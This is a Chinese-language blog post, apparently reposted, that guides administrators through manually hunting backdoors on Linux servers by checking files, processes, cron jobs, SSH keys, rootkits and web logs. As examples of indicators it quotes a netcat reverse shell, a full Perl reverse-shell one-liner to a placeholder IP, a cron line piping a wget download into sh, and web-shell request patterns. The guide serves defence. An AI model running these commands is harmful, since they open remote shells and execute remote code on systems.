手工排查后门木马的常用姿势

声明！本文章所有的工具分享仅仅只是供大家学习交流为主，切勿用于非法用途，如有任何触犯法律的行为，均与本人及团队无关！！！

1. 检查异常文件

（1）查找最近修改的文件

# 查找最近3天内被修改的文件（重点检查Web目录）
find /var/www/ -type f -mtime -3 -ls | sort -k8

● 重点关注：.php、.jsp、.asp、.sh 等可执行文件。

● 隐藏文件：检查 /tmp/、/dev/shm/ 等临时目录。

（2）查找可疑文件名

# 查找包含常见后门特征的文件名
find / -name "*shell*" -o -name "*backdoor*" -o -name "*b374k*" -o -name "*c99*" -ls

● 常见WebShell：shell.php、b374k.php、c99.php、wso.php。

● 隐藏技巧：攻击者可能使用 …gif.php 伪装成图片。

（3）查找大文件（可能含加密数据）

find / -type f -size +5M -exec ls -lh {} \; | grep -v "log\|cache"

● 异常大文件：可能是攻击者存放的加密数据或恶意代码。

2. 检查异常进程

（1）查看运行中的可疑进程

ps aux | grep -E "(sh|bash|perl|python|nc|ncat|socat|wget|curl|\.\/)"

● 常见后门进程：

● nc -lvp 4444 -e /bin/bash（反弹Shell）

● perl -e 'use Socket; $i = " x . x . x . x ";$ p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));connect(S,sockaddr_in( $p,inet_aton($ i)));open(STDIN,“>&S”);open(STDOUT,“>&S”);open(STDERR,“>&S”);exec(“/bin/sh -i”);

（2）检查隐藏进程

# 查看所有进程（包括无二进制文件的进程）
top -c

● 异常进程：无对应文件、占用高CPU、奇怪命令行参数。

（3）检查网络连接

netstat -antp | grep ESTABLISHED
ss -tulnp

● 可疑外联IP：连接到未知IP的 bash、sh、nc 进程。

3. 检查定时任务

（1）查看用户级定时任务

crontab -l

（2）检查系统级定时任务

ls -la /etc/cron.*
cat /etc/crontab

● 异常任务：如 wget http://x.x.x.x/malware.sh | sh。

4. 检查SSH后门

（1）查看SSH登录记录

cat /var/log/auth.log | grep "Accepted"
cat /var/log/secure | grep "Accepted"  # CentOS

● 异常登录：陌生IP、非工作时间登录。

（2）检查SSH密钥

ls -la ~/.ssh/authorized_keys

● 攻击者可能添加自己的公钥，实现免密登录。

（3）检查SSH配置文件

cat /etc/ssh/sshd_config | grep -E "(PermitRootLogin|AllowUsers|Port)"

● 异常配置：PermitRootLogin yes（应禁用root登录）

5. 检查内核级Rootkit

（1）检查系统调用劫持

strace -p <PID>  # 跟踪进程的系统调用

● 异常行为：如 open(“/etc/shadow”) 或 execve(“/bin/sh”)。

（2）使用专用工具检测

# 安装并运行Rootkit检测工具
sudo apt install rkhunter chkrootkit -y
sudo rkhunter --check
sudo chkrootkit

6. 检查Web日志

（1）查找可疑HTTP请求

cat /var/log/apache2/access.log | grep -E "(cmd=|eval|system|passthru|shell_exec)"

● 常见攻击特征：
○ GET /index.php?cmd=whoami
○ POST /upload.php -F “file=@shell.php”

（2）检查大流量IP

cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -nr | head -n 10

● 高频访问IP：可能是攻击者在扫描或爆破。

7.总结

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/pingmian/74083.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！